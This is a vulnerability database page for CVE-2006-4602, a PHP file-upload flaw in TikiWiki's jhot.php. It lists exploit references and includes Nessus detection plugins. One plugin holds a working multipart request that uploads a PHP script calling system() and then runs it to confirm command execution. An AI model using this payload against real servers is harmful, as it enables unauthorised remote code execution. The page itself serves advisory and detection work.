Vulnerabilities > CVE-2006-4602 - Remote Command Execution vulnerability in Tiki Tikiwiki Cms/Groupware 1.9.4

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
tiki
nessus
exploit available
metasploit

Summary

Unrestricted file upload vulnerability in jhot.php in TikiWiki 1.9.4 Sirius and earlier allows remote attackers to execute arbitrary PHP code via a filepath parameter that contains a filename with a .php extension, which is uploaded to the img/wiki/ directory. Per: http://cwe.mitre.org/data/definitions/434.html 'CWE-434: Unrestricted Upload of File with Dangerous Type'

Vulnerable Configurations

Part Description Count
Application
Tiki
1

Exploit-Db

  • descriptionTikiWiki jhot Remote Command Execution. CVE-2006-4602. Webapps exploit for php platform
    idEDB-ID:16885
    last seen2016-02-02
    modified2010-07-25
    published2010-07-25
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16885/
    titleTikiWiki jhot Remote Command Execution
  • descriptionTikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit. CVE-2006-4602. Webapps exploit for php platform
    fileexploits/php/webapps/2288.php
    idEDB-ID:2288
    last seen2016-01-31
    modified2006-09-02
    platformphp
    port
    published2006-09-02
    reporterrgod
    sourcehttps://www.exploit-db.com/download/2288/
    titleTikiWiki <= 1.9 Sirius jhot.php Remote Command Execution Exploit
    typewebapps

Metasploit

descriptionTikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a loss of integrity. The vulnerability was reported in Tikiwiki version 1.9.4.
idMSF:EXPLOIT/UNIX/WEBAPP/TIKIWIKI_JHOT_EXEC
last seen2020-06-13
modified2017-07-24
published2009-03-28
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
titleTikiWiki jhot Remote Command Execution

Nessus

  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_E4C62ABD506511DBA5AE00508D6A62DF.NASL
    descriptionSecunia reports : Thomas Pollet has discovered a vulnerability in TikiWiki, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed to the
    last seen2020-06-01
    modified2020-06-02
    plugin id22490
    published2006-10-02
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/22490
    titleFreeBSD : tikiwiki -- multiple vulnerabilities (e4c62abd-5065-11db-a5ae-00508d6a62df)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(22490);
      script_version("1.16");
      script_cvs_date("Date: 2019/08/02 13:32:38");
    
      script_cve_id("CVE-2006-4299", "CVE-2006-4602");
      script_bugtraq_id(19654, 19819);
      script_xref(name:"Secunia", value:"21536");
      script_xref(name:"Secunia", value:"21733");
    
      script_name(english:"FreeBSD : tikiwiki -- multiple vulnerabilities (e4c62abd-5065-11db-a5ae-00508d6a62df)");
      script_summary(english:"Checks for updated package in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote FreeBSD host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Secunia reports :
    
    Thomas Pollet has discovered a vulnerability in TikiWiki, which can be
    exploited by malicious people to conduct cross-site scripting attacks.
    
    Input passed to the 'highlight' parameter in tiki-searchindex.php is
    not properly sanitised before being returned to the user. This can be
    exploited to execute arbitrary HTML and script code in a user's
    browser session in context of an affected site.
    
    rgod has discovered a vulnerability in TikiWiki, which can be
    exploited by malicious people to compromise a vulnerable system.
    
    The vulnerability is caused due to the 'jhot.php' script not correctly
    verifying uploaded files. This can e.g. be exploited to execute
    arbitrary PHP code by uploading a malicious PHP script to the
    'img/wiki' directory."
      );
      # https://vuxml.freebsd.org/freebsd/e4c62abd-5065-11db-a5ae-00508d6a62df.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?865399fc"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'TikiWiki jhot Remote Command Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:tikiwiki");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2006/08/21");
      script_set_attribute(attribute:"patch_publication_date", value:"2006/09/30");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/02");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"tikiwiki<1.9.5")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyCGI abuses
    NASL idTIKIWIKI_JHOT_ARBITRARY_UPLOADS.NASL
    descriptionThe
    last seen2020-06-01
    modified2020-06-02
    plugin id22303
    published2006-09-04
    reporterThis script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/22303
    titleTikiWiki jhot.php Arbitrary File Upload
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(22303);
      script_version("1.26");
    
      script_cve_id("CVE-2006-4602");
      script_bugtraq_id(19819);
      script_xref(name:"EDB-ID", value:"2288");
    
      script_name(english:"TikiWiki jhot.php Arbitrary File Upload");
      script_summary(english:"Tries to run a command through TikiWiki");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP script that allows uploading of
    arbitrary files." );
     script_set_attribute(attribute:"description", value:
    "The 'jhot.php' script included with the version of TikiWiki installed
    on the remote host allows an unauthenticated attacker to upload
    arbitrary files to a known directory within the web server's document
    root.  Provided PHP's 'file_uploads' setting is enabled, which is true
    by default, this flaw can be exploited to execute arbitrary code on
    the affected host, subject to the privileges of the web server user
    id." );
     script_set_attribute(attribute:"see_also", value:"https://tiki.org/tiki-index.php?page=ReleaseProcess195&bl" );
     script_set_attribute(attribute:"solution", value:
    "Either remove the affected 'jhot.php' script or upgrade to TikiWiki
    1.9.5 or later." );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
     script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
     script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
     script_set_attribute(attribute:"exploit_available", value:"false");
     script_set_attribute(attribute:"exploit_framework_core", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'TikiWiki jhot Remote Command Execution');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/09/04");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/09/04");
     script_cvs_date("Date: 2018/11/15 20:50:19");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_set_attribute(attribute:"cpe",value:"cpe:/a:tikiwiki:tikiwiki");
    script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
    
      script_category(ACT_DESTRUCTIVE_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("http_version.nasl", "no404.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/PHP");
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("data_protection.inc");
    
    port = get_http_port(default:80, embedded: 0, php: 0);
    if (get_kb_item("www/no404/" + port)) exit(0);
    
    
    # Loop through directories.
    if (thorough_tests) dirs = list_uniq(make_list("/tiki", cgi_dirs()));
    else dirs = make_list(cgi_dirs());
    
    foreach dir (dirs) {
      # Make sure the affected script exists.
      url = strcat(dir, "/jhot.php");
      w = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail: 1);
    
      # If it does...
      #
      # nb: the script doesn't respond when called directly.
      if (w[0] =~ "^HTTP/.* 200 OK")
      {
        # Try to exploit the flaw to execute a command.
        cmd = "id";
        fname = strcat(SCRIPT_NAME, "-", unixtime(), ".php");
        bound = "bound";
        boundary = strcat("--", bound);
        postdata = strcat(
          boundary, '\r\n', 
          'Content-Disposition: form-data; name="filepath"; filename="', fname, '";\r\n',
          'Content-Type: image/jpeg;\r\n',
          '\r\n',
          '<?php\r\n',
          'system(', cmd, '); \r\n',
          '?>\r\n',
          '\r\n',
    
          boundary, '--\r\n'
        );
        w = http_send_recv3(method:"POST", item: url, port: port, 
          content_type: "multipart/form-data; boundary="+bound,
          data: postdata, exit_on_fail: 1);
        
        # Now call the file we just uploaded.
        w = http_send_recv3(method:"GET", item: strcat(dir, "/img/wiki/", fname), port:port, exit_on_fail: 1);
        res = w[2];
    
        line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
        if (line)
        {
          if (report_verbosity < 1) security_hole(port);
          else 
          {
            report = strcat(
              '\n',
              'Nessus was able to execute the command \'id\' on the remote host,\n',
              'which produced the following output :\n',
              '\n',
              data_protection::sanitize_uid(output:line)
            );
            security_hole(port:port, extra:report);
          }
          exit(0);
        }
      }
    }
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-200609-16.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-200609-16 (Tikiwiki: Arbitrary command execution) A vulnerability in jhot.php allows for an unrestricted file upload to the img/wiki/ directory. Additionally, an XSS exists in the highlight parameter of tiki-searchindex.php. Impact : An attacker could execute arbitrary code with the rights of the user running the web server by uploading a file and executing it via a filepath parameter. The XSS could be exploited to inject and execute malicious script code or to steal cookie-based authentication credentials, potentially compromising the victim
    last seen2020-06-01
    modified2020-06-02
    plugin id22460
    published2006-09-27
    reporterThis script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/22460
    titleGLSA-200609-16 : Tikiwiki: Arbitrary command execution
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 200609-16.
    #
    # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(22460);
      script_version("1.15");
      script_cvs_date("Date: 2019/08/02 13:32:43");
    
      script_cve_id("CVE-2006-4299", "CVE-2006-4602");
      script_xref(name:"GLSA", value:"200609-16");
    
      script_name(english:"GLSA-200609-16 : Tikiwiki: Arbitrary command execution");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-200609-16
    (Tikiwiki: Arbitrary command execution)
    
        A vulnerability in jhot.php allows for an unrestricted file upload to
        the img/wiki/ directory. Additionally, an XSS exists in the highlight
        parameter of tiki-searchindex.php.
      
    Impact :
    
        An attacker could execute arbitrary code with the rights of the user
        running the web server by uploading a file and executing it via a
        filepath parameter. The XSS could be exploited to inject and execute
        malicious script code or to steal cookie-based authentication
        credentials, potentially compromising the victim's browser.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200609-16"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All Tikiwiki users should upgrade to the latest version:
        # emerge --sync
        # emerge --oneshot --verbose --ask '>=www-apps/tikiwiki-1.9.5'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'TikiWiki jhot Remote Command Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:tikiwiki");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/09/26");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/09/27");
      script_set_attribute(attribute:"vuln_publication_date", value:"2006/08/22");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"www-apps/tikiwiki", unaffected:make_list("ge 1.9.5"), vulnerable:make_list("lt 1.9.5"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Tikiwiki");
    }
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/82371/tikiwiki_jhot_exec.rb.txt
idPACKETSTORM:82371
last seen2016-12-05
published2009-10-30
reporterMatteo Cantoni
sourcehttps://packetstormsecurity.com/files/82371/TikiWiki-jhot-Remote-Command-Execution.html
titleTikiWiki jhot Remote Command Execution

Saint

bid19819
descriptionTikiWiki file upload vulnerability (jhot.php)
idweb_prog_php_tikiwikiupload
osvdb28456
titletikiwiki_jhot_upload
typeremote